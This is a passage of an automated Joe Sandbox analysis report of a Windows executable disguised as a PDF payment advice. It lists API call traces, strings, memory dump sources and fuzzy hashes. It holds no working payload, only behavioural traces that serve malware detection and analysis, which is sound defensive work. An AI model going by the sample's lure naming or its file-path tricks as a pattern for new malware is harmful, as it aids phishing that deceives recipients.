                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                                    • API String ID: 2624150263-3131679198
                                                                                                                                    • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                                    • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                                    • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                                    • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                    • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$Call$N$open
                                                                                                                                    • API String ID: 3615053054-1446803726
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                    • String ID: @Hmu
                                                                                                                                    • API String ID: 4216380887-887474944
                                                                                                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                                    • "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe", xrefs: 0040632D
                                                                                                                                    • *?|<>/":, xrefs: 0040633B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-3585730650
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
